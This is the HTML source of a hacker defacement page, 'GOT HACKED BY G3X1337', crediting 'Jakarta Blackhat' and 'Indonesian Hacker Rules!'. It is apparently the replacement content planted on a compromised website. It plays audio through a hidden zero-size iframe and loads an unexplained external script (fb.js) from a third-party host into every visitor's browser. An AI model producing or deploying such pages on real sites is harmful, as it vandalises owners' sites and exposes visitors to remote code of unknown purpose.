<html>

<head>

<title>GOT HACKED BY G3X1337</title>

<link rel="SHORTCUT ICON" href="https://j.top4top.io/p_1577lljbh0.png" type="image/png">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>

<meta name="author" content="Indonesian Hacker Rules!">

<meta name="keywords" content="Indonesian Hacker Rules!"/>

<meta name="description" content="Indonesian Hacker Rules!">

<meta property="og:image" content="https://e.top4top.io/p_1577pigbg0.jpg"/>

<meta name="googlebot" content="all,index,follow">

<meta name="robots" content="index, follow">

<style>

body	{

	Color: #332f2f;

	text-align: center;

	font-size: 13pt;

	font-family: 'Dosis', sans-serif;

	letter-spacing: 2px;

	line-height: 25px;

}

a 	{

	text-decoration: none;

	color: #332f2f;

}

asu {

	font-size: 20pt; 

	font-family: 'Sedgwick Ave', cursive;

}

asu1{

	font-size: 25pt;

	font-family: 'Berkshire Swash', cursive;

}

</style>

<script type="text/­javascript" src="https://yourjavascript.com/56133167111/fb.js"></script>

</head>

<body>

<link href="https://fonts.googleapis.com/css?family=Berkshire+Swash" rel="stylesheet"> 

<link href="https://fonts.googleapis.com/css?family=Dosis|Sedgwick+Ave" rel="stylesheet">

<br><br><img href='https://www.facebook.com/' src="https://static.tumblr.com/4981a6a282b8a66d4cf54e9617754bed/3u0jbvq/NlMmqrm15/tumblr_static_skeleton_smoking_transparent.gif" align="center" style="width:200px; height:200px; "><br><br>

<span style='font-size: 20px;'>&#1203;&#824;&#1202;&#824;&#1203; Jakarta Blackhat &#1203;&#824;&#1202;&#824;&#1203;</span><br/><span

<asu>Touched By G3X1337</asu><br><br>

~ / <a href="/cdn-cgi/l/email-protection#badd89c28b89898dfaddd7dbd3d694d9d5d7"><font color="red">Contact Me</font></a> \ ~<br><br>Don't Cry<br>When I'am Gone<br>Promise You Are Everything I Want<br><br>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://l.top4top.io/m_15780f91n0.mp3"></iframe>

<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body>

</html>
